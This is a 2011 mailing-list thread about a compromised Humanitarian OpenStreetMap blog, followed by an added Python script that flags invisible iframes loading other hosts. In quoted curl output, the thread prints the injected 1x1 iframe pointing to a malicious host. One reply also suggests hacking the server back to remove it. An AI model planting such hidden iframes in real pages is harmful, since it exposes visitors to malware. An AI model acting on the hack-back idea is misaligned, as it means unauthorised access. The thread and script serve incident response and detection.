[HOT] Malware on hot.openstreetmap.org

Ariel Nunez ingenieroariel at gmail.com
Mon Oct 24 16:23:57 BST 2011


Kate,

If someone could hack it via FTP and add that, perhaps we can hack it too and
remove it.

It actually sounds like fun.

Ariel.

On Mon, Oct 24, 2011 at 2:37 AM, Kate Chapman <kate at maploser.com> wrote:

> Unfortunately there does not appear to be a way I can fix this without
> having access to the actual server.
>
> Any suggestions?  My thought is to back up the blog posts and move it
> to another WordPress instance.  That way then we could switch the DNS
> to the new server.
>
> -Kate
>
> On Sun, Oct 23, 2011 at 11:36 PM, Rodolphe Quiedeville
> <rodolphe at quiedeville.org> wrote:
> > On 24/10/2011 08:28, Kate Chapman wrote:
> >> I switched the theme. I'm not seeing the iFrame anymore, but maybe I'm
> >> missing something.
> >
> > The iframe is not on the /weblog/ pages; you can see it when you call the
> > root URL like this:
> >
> >
> > rodo at elz:~$ curl hot.openstreetmap.org
> > <html>
> > <head>
> > <META HTTP-EQUIV="refresh" content="0;URL=/weblog">
> > </head>
> > <body><iframe
> > src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
> > width="1" height="1"></iframe>
> > <script type="text/javascript">
> > var gaJsHost = (("https:" == document.location.protocol) ?
> > "https://ssl." : "http://www.");
> > document.write(unescape("%3Cscript src='" + gaJsHost +
> > "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
> > </script>
> > <script type="text/javascript">
> > var pageTracker = _gat._getTracker("UA-5963453-1");
> > pageTracker._trackPageview();
> > </script>
> > </body>
> > </html>
> >
> > Have a look at the beginning of the body part.
> >
> > It's probably not in the theme part of WordPress, but somewhere in the
> > config parts of the blog.
> >
> > Regards
> >
> >
> >
> >>
> >> -Kate
> >>
> >> On Sun, Oct 23, 2011 at 10:49 PM, Rodolphe Quiedeville
> >> <rodolphe at quiedeville.org> wrote:
> >>> Hi,
> >>>
> >>> Someone cracked the WordPress installed on hot.openstreetmap.org and added
> >>> an iframe to:
> >>>
> >>> http://probable-waitress.mypicture.info/showthread.php?t=68791819
> >>>
> >>> Edit the WordPress template, remove this iframe and it could resolve
> >>> the problem. The security alert occurs on Firefox too.
> >>>
> >>> Regards
> >>>
> >>>
> >>> On 23/10/2011 23:33, Kate Chapman wrote:
> >>>> Hi Floris,
> >>>>
> >>>> Yes, I know about the problem but haven't been able to fix it.  I think
> >>>> logging into the server might be necessary, but I think only Mikel has
> >>>> access.
> >>>>
> >>>> If anyone has other suggestions please help.
> >>>>
> >>>> Kate
> >>>>
> >>>> On Oct 23, 2011 7:54 AM, "Floris Looijesteijn" <osm at floris.nu> wrote:
> >>>>
> >>>>     I'm getting warnings from Chrome at the moment that
> >>>>     hot.openstreetmap.org is infected with malware.
> >>>>
> >>>>     Anybody want to look into that?
> >>>>
> >>>>     Here's the google diagnose page for it:
> >>>>
> >>>>
> >>>>     http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fhot.openstreetmap.org%2F&client=googlechrome&hl=en
> >>>>
> >>>>     Greetings,
> >>>>     Floris Looijesteijn
> >>>>
> >>>>     (tracing Van, Turkey)
> >>>>
> >>>>     _______________________________________________
> >>>>     HOT mailing list
> >>>>     HOT at openstreetmap.org
> >>>>     http://lists.openstreetmap.org/listinfo/hot
> >>>>
> >>>>
> >>>>
> >>>
> >>>
> >>> --
> >>> Rodolphe Quiédeville
> >>> http://cartosm.eu - Free map integration for websites
> >>> Blog : http://blog.rodolphe.quiedeville.org/
> >>> SIP/XMPP : rodolphe at quiedeville.org
> >>>
> >>>
> >
> >
> > --
> > Rodolphe Quiédeville
> > http://cartosm.eu - Free map integration for websites
> > Blog : http://blog.rodolphe.quiedeville.org/
> > SIP/XMPP : rodolphe at quiedeville.org
> >
>
>
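
The check Rodolphe did by eye on the curl output, written as a script: it flags iframes that load another host and are sized or styled to be invisible. This is an added example, not part of the original thread; the names `HiddenFrameFinder` and `find_hidden_frames`, the 2-pixel threshold and the benign `/weblog/map.html` frame in the sample are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the iframe quoted in the thread plus a benign same-site frame.
SAMPLE = """<html>
<head><META HTTP-EQUIV="refresh" content="0;URL=/weblog"></head>
<body><iframe
src="http://probable-waitress.mypicture.info/showthread.php?t=68791819"
width="1" height="1"></iframe>
<iframe src="/weblog/map.html" width="600" height="400"></iframe>
</body>
</html>"""

class HiddenFrameFinder(HTMLParser):
    """Collect iframes that load another host and are sized or styled to be invisible."""
    def __init__(self, site_host, max_px=2):
        super().__init__()
        self.site_host = site_host.lower()
        self.max_px = max_px  # assumed threshold: anything this small is treated as hidden
        self.findings = []

    def _tiny(self, value):
        # "0", "1" or "1px" count as tiny; percentages and missing values do not.
        m = re.fullmatch(r"(\d+)(px)?", (value or "").strip().lower())
        return bool(m) and int(m.group(1)) <= self.max_px

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if not host or host == self.site_host:
            return  # relative or same-host frame: not what this check looks for
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (self._tiny(a.get("width")) or self._tiny(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        if hidden:
            self.findings.append({"line": self.getpos()[0], "host": host, "src": a["src"]})

def find_hidden_frames(html, site_host):
    finder = HiddenFrameFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

if __name__ == "__main__":
    for f in find_hidden_frames(SAMPLE, "hot.openstreetmap.org"):
        print(f"line {f['line']}: hidden iframe -> {f['host']}")
```

Run against the site root as well as the blog pages, since in this thread the injected frame was only served at the root URL.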